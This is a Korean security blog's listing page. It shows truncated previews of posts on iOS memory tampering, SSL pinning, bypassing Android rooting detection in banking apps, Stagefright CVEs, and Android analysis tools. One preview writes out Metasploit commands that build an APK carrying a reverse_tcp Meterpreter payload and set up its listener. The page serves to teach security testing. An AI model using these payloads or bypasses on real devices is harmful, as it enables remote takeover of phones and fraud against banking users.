본문 바로가기

40.

(38)
iOS Memory 문자열 변조(String Edit in iOS Memory) 메모리 변조하는 방법에 대해서 일부 개발자만 동작원리와 개발하는 방법을 알고있다. 오늘 메모리 변조에 대한 기본 지식, 메모리 함수, 변조 방법까지 정리 할 예정이다. Part 1. 기본 개념 1. Process 프로세스 우리는 HelloWorld.c 컴파일을 하면 HelloWorld.exe을 실행 파일을 생성 수 있다. iOS/OSX는 실행 가능한 파일들이 모두 실행에 필요한 데이터와 명령어가 포함된 March-O 포맷으로 되어있다. 운영체제에서 해당 실행파일을 실행하면 우리는 그걸 프로세스라고 불른다. 사실 실행파일과 프로세스는 데이터와 명령어의 집합이 다른 상태의 같은 오브젝트(객체)이다. 실행 파일은 정적, 프로세스는 동적이라고 볼 수있다. 실행 파일은 하드 디스크에 저장되어있고 프로세스는 메모리..
Securing mobile banking on Android with SSL certificate pinning 애플리케이션과 서버간에 민감한 정보를 안전하게 전송하고 싶을 때, SSL 방식을 채택하여 사용할 것이다. 하지만 SSL 채택은 반만 맞는 이야기다. 애플리케이션과 서버간에 민감한 데이터를 전송하는 일은 빈번하다. 가장 대표적인 예로는 모바일 은행 애플리케이션이 있다. 가장 최악의 사황으로는 악의적인 해커가 당신의 은행 계좌 정보나 돈을 훔치거나 더 나쁜 행위를 저지를 수 있다. 모바일 뱅킹 솔루션에서 보안은 중요하기 때문에 데이터의 안전과 비밀성을 유지하기 위해서 SSL을 사용하는 것이다. 하지만 이러한 방법은 깨질 수 있다. Certificate pinning이란? SSL 연결을 만들 때 기본적으로 클라이언트는 서버의 인증서를 확인하게 된다. - 신뢰할수 있는 상위(root) 인증서를 검증 가능한 체인..
Android Rooting 체크 우회(Hooking with Cydia Substrate) 일부 금융 모바일 애플리케이션의 경우 Super user 권한을 임시 비활성화해도 정상 작동하지만 대부분의 금융 애플리케이션은 위변조를 통하여 Android 플랫폼 위변조를 탐지를 우회하게 된다. 하지만 최근 모바일 애플리케이션은 난독화, 재컴파일 방지, 위변조 탐지 등을 통해서 애플리케이션 위변조를 이용한 Super user 권한 탐지 우회가 어려워지고 있다. Android Hooking 후킹(영어: hooking)은 소프트웨어 공학 용어로, 운영 체제나 응용 소프트웨어 등의 각종 컴퓨터 프로그램에서 소프트웨어 구성 요소 간에 발생하는 함수 호출, 메시지, 이벤트 등을 중간에서 바꾸거나 가로채는 명령, 방법, 기술이나 행위를 말한다. 이때 이러한 간섭된 함수 호출, 이벤트 또는 메시지를 처리하는 코드를..
[Android Exploit] Android Exploit with metasploit metasploit reverse_tcp android http://exploiterz.blogspot.kr/2013/07/how-to-hack-android-devices-using.html 메타익스플로잇을 사용하여 안드로이드 Exploit Code가 포함된 APK 생성 및 리버스커넥션 연결하기 # ifconfig # msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > oneandonlyme.apk # msfconsole msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handl..
[Android Exploit] Stagefright 취약점 Android 미디어 파일을 처리하는 Stagefright에서 다수의 정수 오버플로우 취약점이 발견되어 해커가 조작된 미디어 파일을 MMS를 이용하여 피해자로 전송할 경우 사용자의 인지 없이 원격 코드 실행 및 권한상승이 가능하다. 영향 받는 버전 안드로이드 2.2(Froyo) ~ 5.1.1_r5(Lollipop) Common Vulnerabilities and Exposures (CVE) 번호 CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 테스트 https://www.exploit-db.com/exploits/38124/ exploit code를 실행하면 수많은 에러 메세지가 발생한다. Linux에서..
Android Tool Please use left sidebar to navigate between sections. Last Updated on: 8-May-2015 Forensics Tools Android Forensics - Open Source Android Forensics App and Framework Android Data Extractor Lite BitPim - BitPim is a program that allows you to view and manipulate data on many CDMA phones from LG, Samsung, Sanyo and other manufacturers. LiME - LiME (formerly DMD) is a Loadable Kernel Module (LKM), ..
Sublime Text에서 Androguard plugin 설치 및 사용법 Sublime Text에서 Androguard plugin 설치 및 사용법Androguard 툴은 애플리케이션 분석 및 apk 파일 리버싱 엔지니어링에 주로 초점되어 있으며, 안드로이드 애플리케이션 평가용으로 사용된다. 툴은 파이선으로 되어있으며 명령어 프롬프트를 이용하여 apk 파일에 접근이 가능하다. Installation 설치우선 플러그인이 설치 가능한 Sublime text 버전을 설치해야한다. Sublime Text version 2 : http://www.sublimetext.com/2 또한, Androguard plugin 집 파일을 다운받아야 한다. androguard flugin : https://androguard.googlecode.com/files/ag-st-1.9.zip Porta..
[Android] 안드로이드에 python 설치 안드로이드 Python 설치Scripting Layer for Android brings scripting languages to Android.https://code.google.com/p/android-scripting/ android-scriptinghttps://code.google.com/p/android-scripting/downloads/detail?name=PythonForAndroid_r4.apk